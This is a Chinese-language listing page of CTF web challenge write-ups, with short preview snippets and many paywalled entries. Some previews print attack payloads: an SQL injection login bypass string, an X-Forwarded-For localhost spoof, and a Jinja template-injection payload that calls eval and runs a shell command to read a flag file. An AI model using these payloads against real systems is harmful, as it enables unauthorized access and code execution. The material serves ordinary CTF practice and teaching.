-
HackINI-2021 my-first-sqli
本题为SQL注入攻击的典型场景SQL语句拼接漏洞登录界面的后端代码直接将用户输入的用户名和密码拼接到SQL查询语句中,没有做任何安全校验和参数化处理。原本的查询语句应该是:SELECT*FROMUSERSWHEREusername='admin'ANDpassword='正确密码'2.恶意语句的构造逻辑:用户输入的admin'or'1'='1'--会和原语句拼接成:SELECT*FROMUSE...
- WEB
- 7天前
-
HackINI-2021 post-the-get
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 7天前
-
HackINI-2021 inspect-me
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 7天前
-
JW token
进入网页后,右键,点击检查,找到应用程序,获得token;进入https://www.jwt.io/解密
- WEB
- 13天前
-
0xGame 2020 jwt
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 1月前
-
Bugku_Outsiders
F12HackBarLoadURLAddHeaderx-forwarded-for:127.0.0.1Execute,得到Flag:Icangivetheflagtomyself,right?N0PS{XF0rw4Rd3D}
- WEB
- 1月前
-
Bugku_CaaS
Payloadname={{g.pop["global""s"].builtins.eval(request.form.team_name)}}&team_name=import("os").popen("catflag.txt").read()屏幕输出Haha!Nocertificateforn00bz{5571_57r1k3s_4g41n_7a1b3f4e5d}
- WEB
- 1月前
-
hellogate
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 2月前
-
Securinets>Friendly-2022>Cr4zy-Js0N
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 3月前
-
TJCTF >2022>fruit-store
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 3月前
-
[UMDCTF 2023]pop-calc
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 4月前
-
2020jwt
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 4月前
-
inspect me
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 5月前
-
SecretVault
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 6月前
-
[DownUnderCTF2024]co2
题目描述:一群喜欢"打破传统"做事的学生搭了一个网络安全博客站。你被雇佣对他们的网络应用进行深入的白盒测试。附件下载下来开始审计这里找到一个flag相关的函数,深入搜索发现变量flag没给用户赋值的机会,,,!routes.py!↓@app.route("/save_feedback",methods=["POST"])@login_requireddefsave_feedback():data=...
- WEB
- 6月前
-
UMDCTF 2023-i-heart-wasm
我们可以在wasm二进制文件中嵌入自定义部分,并从JavaScript中访问它们。控制台输入:WebAssembly.compileStreaming(fetch("./pkg/wasm_test_bg.wasm")).then(mod=>{letflag="";for(leti=42;i>=0;i--){constsections=WebAssembly.Module.customS...
- WEB
- 7月前
-
strpos and substr
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 7月前
-
[wp]Terps Ticketing System
启动场景,场景页面如下:在Name输入框随便输入,Email输入框输入含“@”且“@”前后有内容的字符串后,url上会带上“/ticket?num=xxx”(xxx为一个数字)。尝试num=0得到:flag出现了。
- WEB
- 8月前
-
Loginme
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 8月前
-
CakeGEAR
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 9月前